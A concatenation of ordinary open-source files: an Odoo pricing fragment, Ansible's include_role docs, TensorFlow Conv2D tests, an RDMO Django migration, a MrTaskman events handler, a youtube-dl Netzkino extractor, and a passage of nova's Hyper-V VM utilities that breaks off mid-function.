new_list_price = get_real_price(list_price, product.id, qty, uom, pricelist)
if so_pricelist.visible_discount and list_price[pricelist] != 0 and new_list_price != 0:
if product.company_id and so_pricelist.currency_id.id != product.company_id.currency_id.id:
# new_list_price is in company's currency while price in pricelist currency
ctx = context.copy()
ctx['date'] = date_order
new_list_price = self.pool['res.currency'].compute(cr, uid,
product.company_id.currency_id.id, so_pricelist.currency_id.id,
new_list_price, context=ctx)
discount = (new_list_price - price) / new_list_price * 100
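                # (added note) e.g. a list price of 100.0 and a pricelist
                # price of 80.0 yield a 20% visible discount, so the customer
                # sees the full list price plus an explicit discount instead
                # of a silently lowered unit price.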
if discount > 0:
result['price_unit'] = new_list_price
result['discount'] = discount
else:
result['discount'] = 0.0
else:
result['discount'] = 0.0
else:
result['discount'] = 0.0
return res
|
KohlsTechnology/ansible | refs/heads/devel | lib/ansible/modules/utilities/logic/include_role.py | 3 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'
}
DOCUMENTATION = '''
---
author: Ansible Core Team (@ansible)
module: include_role
short_description: Load and execute a role
description:
- Loads and executes a role as a task dynamically. This frees roles from the `roles:` directive and allows them to be
treated more as tasks.
- Unlike M(import_role), most keywords, including loops and conditionals, apply to this statement.
- This module is also supported for Windows targets.
version_added: "2.2"
options:
name:
description:
- The name of the role to be executed.
required: True
tasks_from:
description:
- File to load from a role's C(tasks/) directory.
default: main
vars_from:
description:
- File to load from a role's C(vars/) directory.
default: main
defaults_from:
description:
- File to load from a role's C(defaults/) directory.
default: main
allow_duplicates:
description:
- Overrides the role's metadata setting to allow using a role more than once with the same parameters.
type: bool
default: 'yes'
private:
description:
- If C(yes) the variables from C(defaults/) and C(vars/) in a role will not be made available to the rest of the
play.
type: bool
default: 'no'
notes:
- Handlers are made available to the whole play.
  - Before Ansible 2.4, as with C(include), this task could be static or dynamic. If static, it implied that it would
    not need templating, loops or conditionals and would show included tasks in the `--list` options. Ansible would
    try to autodetect what was needed, but you could set `static` to `yes` or `no` at the task level to control this.
  - After Ansible 2.4, you can use M(import_role) for 'static' behaviour and this action for the 'dynamic' one.
'''
EXAMPLES = """
- include_role:
name: myrole
- name: Run tasks/other.yaml instead of 'main'
include_role:
name: myrole
tasks_from: other
- name: Pass variables to role
include_role:
name: myrole
vars:
rolevar1: value from task
- name: Use role in loop
include_role:
name: myrole
with_items:
- '{{ roleinput1 }}'
- '{{ roleinput2 }}'
loop_control:
loop_var: roleinputvar
- name: Conditional role
include_role:
name: myrole
when: not idontwanttorun
"""
RETURN = """
# This module does not return anything except tasks to execute.
"""
|
dyoung418/tensorflow | refs/heads/master | tensorflow/compiler/tests/conv2d_test.py | 35 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Conv2D via the XLA JIT.
The canned results in these tests are created by running each test using the
Tensorflow CPU device and saving the output.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import googletest
class Conv2DTest(XLATestCase):
def _VerifyValues(self, input_sizes, filter_sizes, stride, padding, expected):
"""Tests that tf.nn.conv2d produces the expected value.
Args:
input_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
stride: Stride.
padding: Padding type.
expected: Expected output.
"""
total_size_1 = np.prod(input_sizes)
total_size_2 = np.prod(filter_sizes)
x1 = np.arange(1, total_size_1 + 1, dtype=np.float32).reshape(input_sizes)
x2 = np.arange(1, total_size_2 + 1, dtype=np.float32).reshape(filter_sizes)
strides = [1, stride, stride, 1]
with self.test_session() as sess:
with self.test_scope():
t1 = array_ops.placeholder(dtypes.float32, shape=input_sizes)
t2 = array_ops.placeholder(dtypes.float32, shape=filter_sizes)
out = nn_ops.conv2d(
t1, t2, strides=strides, padding=padding, data_format="NHWC")
value = sess.run(out, {t1: x1, t2: x2})
self.assertArrayNear(expected, np.ravel(value), 1e-3)
def testConv2D1x1Filter(self):
expected_output = [
30.0, 36.0, 42.0, 66.0, 81.0, 96.0, 102.0, 126.0, 150.0, 138.0, 171.0,
204.0, 174.0, 216.0, 258.0, 210.0, 261.0, 312.0
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[1, 1, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[1, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
stride=2,
padding="SAME",
expected=expected_output)
class Conv2DBackpropInputTest(XLATestCase):
def _VerifyValues(self, input_sizes, filter_sizes, out_backprop_sizes, stride,
padding, expected):
"""Tests that gen_nn_ops.conv2d_backprop_input produces the expected output.
Args:
input_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
out_backprop_sizes: Output gradients tensor dimensions.
stride: Stride.
padding: Padding type.
expected: Expected output.
"""
total_size_1 = np.prod(filter_sizes)
total_size_2 = np.prod(out_backprop_sizes)
x1 = np.arange(1, total_size_1 + 1, dtype=np.float32).reshape(filter_sizes)
x2 = np.arange(
1, total_size_2 + 1, dtype=np.float32).reshape(out_backprop_sizes)
strides = [1, stride, stride, 1]
with self.test_session() as sess:
with self.test_scope():
t1 = array_ops.placeholder(dtypes.float32, shape=filter_sizes)
t2 = array_ops.placeholder(dtypes.float32, shape=out_backprop_sizes)
out = gen_nn_ops.conv2d_backprop_input(
input_sizes=input_sizes,
filter=t1,
out_backprop=t2,
strides=strides,
padding=padding,
data_format="NHWC")
value = sess.run(out, {t1: x1, t2: x2})
self.assertArrayNear(expected, np.ravel(value), 1e-3)
def testConv2D1x1Filter(self):
expected_output = [
5, 11, 17, 11, 25, 39, 17, 39, 61, 23, 53, 83, 29, 67, 105, 35, 81, 127,
41, 95, 149, 47, 109, 171, 53, 123, 193, 59, 137, 215, 65, 151, 237, 71,
        165, 259, 77, 179, 281, 83, 193, 303, 89, 207, 325, 95, 221, 347
]
self._VerifyValues(
input_sizes=[1, 4, 4, 3],
filter_sizes=[1, 1, 3, 2],
out_backprop_sizes=[1, 4, 4, 2],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width5(self):
expected_output = [1, 2, 0, 2, 4]
self._VerifyValues(
input_sizes=[1, 1, 5, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width6(self):
expected_output = [1, 2, 0, 2, 4, 0]
self._VerifyValues(
input_sizes=[1, 1, 6, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width7(self):
expected_output = [1, 2, 0, 2, 4, 0, 0]
self._VerifyValues(
input_sizes=[1, 1, 7, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterC1Same(self):
expected_output = [1, 4, 7, 7, 23, 33]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 2, 3, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [
14, 32, 50, 100, 163, 226, 167, 212, 257, 122, 140, 158, 478, 541, 604,
437, 482, 527
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
out_backprop_sizes=[1, 1, 2, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterSame(self):
expected_output = [
14, 32, 50, 100, 163, 226, 217, 334, 451, 190, 307, 424, 929, 1217,
1505, 1487, 1883, 2279
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
out_backprop_sizes=[1, 2, 3, 3],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [1, 4, 4, 3, 10, 8, 5, 16, 12]
self._VerifyValues(
input_sizes=[1, 3, 3, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 3, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterSame(self):
expected_output = [1, 4, 7, 4, 13, 16, 7, 22, 25]
self._VerifyValues(
input_sizes=[1, 3, 3, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 3, 3, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [1, 2, 5, 4, 6, 0, 0, 0, 0, 0, 3, 6, 13, 8, 12]
self._VerifyValues(
input_sizes=[1, 3, 5, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 2, 2, 1],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
expected_output = [1, 2, 2, 3, 4, 6]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=2,
padding="SAME",
expected=expected_output)
class Conv2DBackpropFilterTest(XLATestCase):
def _VerifyValues(self, input_sizes, filter_sizes, out_backprop_sizes, stride,
padding, expected):
"""Tests that gen_nn_ops.conv2d_backprop_filter produces the right output.
Args:
input_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
out_backprop_sizes: Output gradients tensor dimensions.
stride: Stride.
padding: Padding type.
expected: Expected output.
"""
total_size_1 = np.prod(input_sizes)
total_size_2 = np.prod(out_backprop_sizes)
x1 = np.arange(1, total_size_1 + 1, dtype=np.float32).reshape(input_sizes)
x2 = np.arange(
1, total_size_2 + 1, dtype=np.float32).reshape(out_backprop_sizes)
strides = [1, stride, stride, 1]
with self.test_session() as sess:
with self.test_scope():
t1 = array_ops.placeholder(dtypes.float32, shape=input_sizes)
t2 = array_ops.placeholder(dtypes.float32, shape=out_backprop_sizes)
tensor = gen_nn_ops.conv2d_backprop_filter(
input=t1,
filter_sizes=filter_sizes,
out_backprop=t2,
strides=strides,
padding=padding,
data_format="NHWC")
value = sess.run(tensor, {t1: x1, t2: x2})
self.assertArrayNear(expected, np.ravel(value), 1e-3)
def testConv2D1x1Filter(self):
expected_output = [8056, 8432, 8312, 8704, 8568, 8976]
self._VerifyValues(
input_sizes=[1, 4, 4, 3],
filter_sizes=[1, 1, 3, 2],
out_backprop_sizes=[1, 4, 4, 2],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [120, 141]
self._VerifyValues(
input_sizes=[1, 3, 3, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 3, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterDepth1(self):
expected_output = [5, 8, 14, 17]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [
17, 22, 27, 22, 29, 36, 27, 36, 45, 32, 43, 54, 37, 50, 63, 42, 57, 72,
62, 85, 108, 67, 92, 117, 72, 99, 126, 77, 106, 135, 82, 113, 144, 87,
120, 153
]
self._VerifyValues(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
out_backprop_sizes=[1, 1, 2, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width5(self):
expected_output = [9, 12]
self._VerifyValues(
input_sizes=[1, 1, 5, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width6(self):
expected_output = [9, 12]
self._VerifyValues(
input_sizes=[1, 1, 6, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x2FilterStride3Width7(self):
expected_output = [9, 12]
self._VerifyValues(
input_sizes=[1, 1, 7, 1],
filter_sizes=[1, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=3,
padding="VALID",
expected=expected_output)
def testConv2D1x3Filter(self):
expected_output = [5, 8, 11]
self._VerifyValues(
input_sizes=[1, 1, 4, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x3FilterSame(self):
expected_output = [20, 30, 20]
self._VerifyValues(
input_sizes=[1, 1, 4, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 1, 4, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D1x3FilterSameOutbackprop2(self):
expected_output = [7, 10, 3]
self._VerifyValues(
input_sizes=[1, 1, 4, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=2,
padding="SAME",
expected=expected_output)
def testConv2D2x2FilterC1Same(self):
expected_output = [91, 58, 32, 17]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 2, 3, 1],
stride=1,
padding="SAME",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [92, 102, 112]
self._VerifyValues(
input_sizes=[1, 3, 5, 1],
filter_sizes=[1, 3, 1, 1],
out_backprop_sizes=[1, 2, 2, 1],
stride=2,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2Same(self):
expected_output = [7, 2, 16, 5]
self._VerifyValues(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
out_backprop_sizes=[1, 1, 2, 1],
stride=2,
padding="SAME",
expected=expected_output)
if __name__ == "__main__":
googletest.main()
|
rdmorganiser/rdmo | refs/heads/master | rdmo/conditions/migrations/0020_require_uri_prefix.py | 1 | # Generated by Django 2.2.6 on 2019-10-29 12:08
from django.conf import settings
from django.db import migrations, models
def run_data_migration(apps, schema_editor):
for element in apps.get_model('conditions', 'Condition').objects.all():
element.uri_prefix = element.uri_prefix or settings.DEFAULT_URI_PREFIX
element.save()
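
# (added note) The data migration above backfills empty prefixes with
# settings.DEFAULT_URI_PREFIX before the AlterField below tightens the field
# definition; no reverse function is given, so unapplying this migration is
# not supported.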
class Migration(migrations.Migration):
dependencies = [
('conditions', '0019_django2'),
]
operations = [
migrations.RunPython(run_data_migration),
migrations.AlterField(
model_name='condition',
name='uri_prefix',
field=models.URLField(help_text='The prefix for the URI of this condition.', max_length=256, verbose_name='URI Prefix'),
),
]
|
salomon1184/bite-project | refs/heads/master | deps/mrtaskman/server/handlers/events.py | 16 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handlers for the MrTaskman Events API."""
__author__ = 'jeff.carollo@gmail.com (Jeff Carollo)'
import json
import logging
import urllib
import webapp2
from models import events
from util import model_to_dict
class EventsError(Exception):
def __init__(self, message):
Exception.__init__(self, message)
class EventsHandler(webapp2.RequestHandler):
"""Handles requests for Events."""
def get(self, arg='all'):
"""Dispatches GET request to the right method according to form."""
logging.info('got arg: %s', arg)
if arg.isdigit():
return self.GetEventById(arg)
if arg == 'all':
return self.GetAllEvents()
self.response.out.write('Invalid argument: %s' % arg)
self.response.set_status(400)
return
def GetAllEvents(self):
"""Convenience HTML form for testing."""
accept_type = self.GetAcceptTypeHtmlOrJson()
self.response.headers['Content-Type'] = accept_type
event_list = events.GetEventList()
if 'html' in accept_type:
# TODO(jeff.carollo): Extract out to Django templates.
self.response.out.write(
"""
<html><head><title>Events</title></head><body>
          <pre><code>%s</code></pre>
</body></html>
""" % '<br/>'.join([
json.dumps(model_to_dict.ModelToDict(event), indent=2)
for event in event_list]))
self.response.out.write('\n')
return
if 'json' in accept_type:
response = dict()
response['kind'] = 'mrtaskman#event_list'
response['event_list'] = [
model_to_dict.ModelToDict(event) for event in event_list]
json.dump(response, self.response.out, indent=2)
self.response.out.write('\n')
return
# Should never get here.
logging.error('Sending 500 because we could not determine a Content-Type.')
self.response.out.write('Accept type not text/html or application/json.')
self.response.set_status(500)
return
def post(self):
"""Creates an Event from a worker."""
logging.info('Request: %s', self.request.body)
event = urllib.unquote(self.request.body.decode('utf-8'))
try:
event = json.loads(event, 'utf-8')
except ValueError, e:
logging.info(e)
event = None
if not event or not event.get('kind', '') == 'mrtaskman#event':
self.response.out.write('POST body must contain an Event entity.')
self.response.set_status(400)
return
try:
event = events.CreateEvent(event)
except events.ClientEventError, e:
self.response.out.write('Error creating event: %s' % e.message)
self.response.set_status(400)
return
except events.ServerEventError, e:
self.response.out.write('Error creating event: %s' % e.message)
self.response.set_status(500)
return
self.response.headers['Content-Type'] = 'application/json'
response = model_to_dict.ModelToDict(event)
response['kind'] = 'mrtaskman#event'
json.dump(response, self.response.out, indent=2)
self.response.out.write('\n')
def GetAcceptTypeHtmlOrJson(self):
"""Parses Accept header and determines whether to send HTML or JSON.
Defaults to 'application/json' unless HTML comes first in Accept line.
Returns:
Accept type as str.
"""
accept = self.request.headers.get('Accept', '')
accepts = accept.split(';')
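    # Note (added): media ranges in an Accept header are separated by ',';
    # splitting on ';' also breaks off q-parameters, which is harmless for
    # the simple substring checks below.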
accept = 'application/json'
for candidate_accept in accepts:
if 'json' in candidate_accept:
break
if 'html' in candidate_accept:
accept = 'text/html'
break
return accept
def GetEventById(self, event_id):
"""Retrieves an Event."""
try:
event_id = int(event_id)
except:
self.response.out.write('event_id must be numeric')
self.response.set_status(400)
return
try:
event = events.GetEventById(event_id)
except events.ClientEventError, e:
logging.exception(e)
self.response.out.write('Error retrieving Event info: %s' % e.message)
self.response.set_status(400)
return
except events.ServerEventError, e:
logging.exception(e)
self.response.out.write('Error retrieving Event info: %s' % e.message)
self.response.set_status(500)
return
if not event:
logging.info('No event found with id %d', event_id)
self.response.set_status(404)
return
response = model_to_dict.ModelToDict(event)
response['kind'] = 'mrtaskman#event'
self.response.headers['Content-Type'] = 'application/json'
json.dump(response, self.response.out, indent=2)
self.response.out.write('\n')
def delete(self, event_id):
"""Deletes a package and its associated blobs."""
try:
event_id = int(event_id)
except:
self.response.out.write('event_id must be numeric')
self.response.set_status(400)
return
deleted = events.DeleteEventById(event_id)
if not deleted:
self.response.set_status(404)
return
app = webapp2.WSGIApplication([
('/events/([a-z0-9]+)', EventsHandler),
('/events', EventsHandler),
], debug=True)
|
jlegendary/youtube-dl | refs/heads/master | youtube_dl/extractor/netzkino.py | 142 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
clean_html,
int_or_none,
js_to_json,
parse_iso8601,
)
class NetzkinoIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?netzkino\.de/\#!/(?P<category>[^/]+)/(?P<id>[^/]+)'
_TEST = {
'url': 'http://www.netzkino.de/#!/scifikino/rakete-zum-mond',
'md5': '92a3f8b76f8d7220acce5377ea5d4873',
'info_dict': {
'id': 'rakete-zum-mond',
'ext': 'mp4',
'title': 'Rakete zum Mond (Endstation Mond, Destination Moon)',
'comments': 'mincount:3',
'description': 'md5:1eddeacc7e62d5a25a2d1a7290c64a28',
'upload_date': '20120813',
'thumbnail': 're:https?://.*\.jpg$',
'timestamp': 1344858571,
'age_limit': 12,
},
'params': {
'skip_download': 'Download only works from Germany',
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
category_id = mobj.group('category')
video_id = mobj.group('id')
api_url = 'http://api.netzkino.de.simplecache.net/capi-2.0a/categories/%s.json?d=www' % category_id
api_info = self._download_json(api_url, video_id)
info = next(
p for p in api_info['posts'] if p['slug'] == video_id)
custom_fields = info['custom_fields']
production_js = self._download_webpage(
'http://www.netzkino.de/beta/dist/production.min.js', video_id,
note='Downloading player code')
avo_js = self._search_regex(
r'var urlTemplate=(\{.*?"\})',
production_js, 'URL templates')
templates = self._parse_json(
avo_js, video_id, transform_source=js_to_json)
suffix = {
'hds': '.mp4/manifest.f4m',
'hls': '.mp4/master.m3u8',
'pmd': '.mp4',
}
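        # (added note) The keys name delivery methods (Adobe HDS manifest,
        # HLS master playlist, progressive MP4 download); the film filename
        # replaces the literal '{}' placeholder in each URL template below.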
film_fn = custom_fields['Streaming'][0]
formats = [{
'format_id': key,
'ext': 'mp4',
'url': tpl.replace('{}', film_fn) + suffix[key],
} for key, tpl in templates.items()]
self._sort_formats(formats)
comments = [{
'timestamp': parse_iso8601(c.get('date'), delimiter=' '),
'id': c['id'],
'author': c['name'],
'html': c['content'],
'parent': 'root' if c.get('parent', 0) == 0 else c['parent'],
} for c in info.get('comments', [])]
return {
'id': video_id,
'formats': formats,
'comments': comments,
'title': info['title'],
            'age_limit': int_or_none(custom_fields.get('FSK', [None])[0]),
'timestamp': parse_iso8601(info.get('date'), delimiter=' '),
'description': clean_html(info.get('content')),
'thumbnail': info.get('thumbnail'),
'playlist_title': api_info.get('title'),
'playlist_id': category_id,
}
|
CiscoSystems/nova | refs/heads/master | nova/virt/hyperv/vmutils.py | 8 | # Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl / Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VM related operations on Hyper-V.
"""
import sys
import time
import uuid
if sys.platform == 'win32':
import wmi
from oslo.config import cfg
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.virt.hyperv import constants
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# TODO(alexpilotti): Move the exceptions to a separate module
# TODO(alexpilotti): Add more domain exceptions
class HyperVException(exception.NovaException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
# TODO(alexpilotti): Add a storage exception base class
class VHDResizeException(HyperVException):
    def __init__(self, message=None):
        super(VHDResizeException, self).__init__(message)
class HyperVAuthorizationException(HyperVException):
    def __init__(self, message=None):
        super(HyperVAuthorizationException, self).__init__(message)
class UnsupportedConfigDriveFormatException(HyperVException):
    def __init__(self, message=None):
        super(UnsupportedConfigDriveFormatException, self).__init__(message)
class VMUtils(object):
# These constants can be overridden by inherited classes
_PHYS_DISK_RES_SUB_TYPE = 'Microsoft Physical Disk Drive'
_DISK_RES_SUB_TYPE = 'Microsoft Synthetic Disk Drive'
_DVD_RES_SUB_TYPE = 'Microsoft Synthetic DVD Drive'
_IDE_DISK_RES_SUB_TYPE = 'Microsoft Virtual Hard Disk'
_IDE_DVD_RES_SUB_TYPE = 'Microsoft Virtual CD/DVD Disk'
_IDE_CTRL_RES_SUB_TYPE = 'Microsoft Emulated IDE Controller'
_SCSI_CTRL_RES_SUB_TYPE = 'Microsoft Synthetic SCSI Controller'
_SETTINGS_DEFINE_STATE_CLASS = 'Msvm_SettingsDefineState'
_VIRTUAL_SYSTEM_SETTING_DATA_CLASS = 'Msvm_VirtualSystemSettingData'
_RESOURCE_ALLOC_SETTING_DATA_CLASS = 'Msvm_ResourceAllocationSettingData'
_PROCESSOR_SETTING_DATA_CLASS = 'Msvm_ProcessorSettingData'
_MEMORY_SETTING_DATA_CLASS = 'Msvm_MemorySettingData'
_STORAGE_ALLOC_SETTING_DATA_CLASS = _RESOURCE_ALLOC_SETTING_DATA_CLASS
_SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS = \
'Msvm_SyntheticEthernetPortSettingData'
_AFFECTED_JOB_ELEMENT_CLASS = "Msvm_AffectedJobElement"
_vm_power_states_map = {constants.HYPERV_VM_STATE_ENABLED: 2,
constants.HYPERV_VM_STATE_DISABLED: 3,
constants.HYPERV_VM_STATE_REBOOT: 10,
constants.HYPERV_VM_STATE_PAUSED: 32768,
constants.HYPERV_VM_STATE_SUSPENDED: 32769}
def __init__(self, host='.'):
self._enabled_states_map = dict((v, k) for k, v in
self._vm_power_states_map.iteritems())
if sys.platform == 'win32':
self._init_hyperv_wmi_conn(host)
self._conn_cimv2 = wmi.WMI(moniker='//%s/root/cimv2' % host)
def _init_hyperv_wmi_conn(self, host):
self._conn = wmi.WMI(moniker='//%s/root/virtualization' % host)
def list_instances(self):
"""Return the names of all the instances known to Hyper-V."""
vm_names = [v.ElementName for v in
self._conn.Msvm_ComputerSystem(['ElementName'],
Caption="Virtual Machine")]
return vm_names
def get_vm_summary_info(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
vmsettings = vm.associators(
wmi_association_class=self._SETTINGS_DEFINE_STATE_CLASS,
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
settings_paths = [v.path_() for v in vmsettings]
#See http://msdn.microsoft.com/en-us/library/cc160706%28VS.85%29.aspx
(ret_val, summary_info) = vs_man_svc.GetSummaryInformation(
[constants.VM_SUMMARY_NUM_PROCS,
constants.VM_SUMMARY_ENABLED_STATE,
constants.VM_SUMMARY_MEMORY_USAGE,
constants.VM_SUMMARY_UPTIME],
settings_paths)
if ret_val:
raise HyperVException(_('Cannot get VM summary data for: %s')
% vm_name)
si = summary_info[0]
memory_usage = None
if si.MemoryUsage is not None:
memory_usage = long(si.MemoryUsage)
up_time = None
if si.UpTime is not None:
up_time = long(si.UpTime)
enabled_state = self._enabled_states_map[si.EnabledState]
summary_info_dict = {'NumberOfProcessors': si.NumberOfProcessors,
'EnabledState': enabled_state,
'MemoryUsage': memory_usage,
'UpTime': up_time}
return summary_info_dict
def _lookup_vm_check(self, vm_name):
vm = self._lookup_vm(vm_name)
if not vm:
raise exception.NotFound(_('VM not found: %s') % vm_name)
return vm
def _lookup_vm(self, vm_name):
vms = self._conn.Msvm_ComputerSystem(ElementName=vm_name)
n = len(vms)
if n == 0:
return None
elif n > 1:
raise HyperVException(_('Duplicate VM name found: %s') % vm_name)
else:
return vms[0]
def vm_exists(self, vm_name):
return self._lookup_vm(vm_name) is not None
def get_vm_id(self, vm_name):
vm = self._lookup_vm_check(vm_name)
return vm.Name
def _get_vm_setting_data(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
# Avoid snapshots
return [s for s in vmsettings if s.SettingType == 3][0]
def _set_vm_memory(self, vm, vmsetting, memory_mb, dynamic_memory_ratio):
mem_settings = vmsetting.associators(
wmi_result_class=self._MEMORY_SETTING_DATA_CLASS)[0]
max_mem = long(memory_mb)
mem_settings.Limit = max_mem
if dynamic_memory_ratio > 1:
mem_settings.DynamicMemoryEnabled = True
# Must be a multiple of 2
reserved_mem = min(
long(max_mem / dynamic_memory_ratio) >> 1 << 1,
max_mem)
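            # (added note) '>> 1 << 1' clears the lowest bit, rounding the
            # reservation down to the even number of MB required above.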
else:
mem_settings.DynamicMemoryEnabled = False
reserved_mem = max_mem
mem_settings.Reservation = reserved_mem
# Start with the minimum memory
mem_settings.VirtualQuantity = reserved_mem
self._modify_virt_resource(mem_settings, vm.path_())
def _set_vm_vcpus(self, vm, vmsetting, vcpus_num, limit_cpu_features):
procsetting = vmsetting.associators(
wmi_result_class=self._PROCESSOR_SETTING_DATA_CLASS)[0]
vcpus = long(vcpus_num)
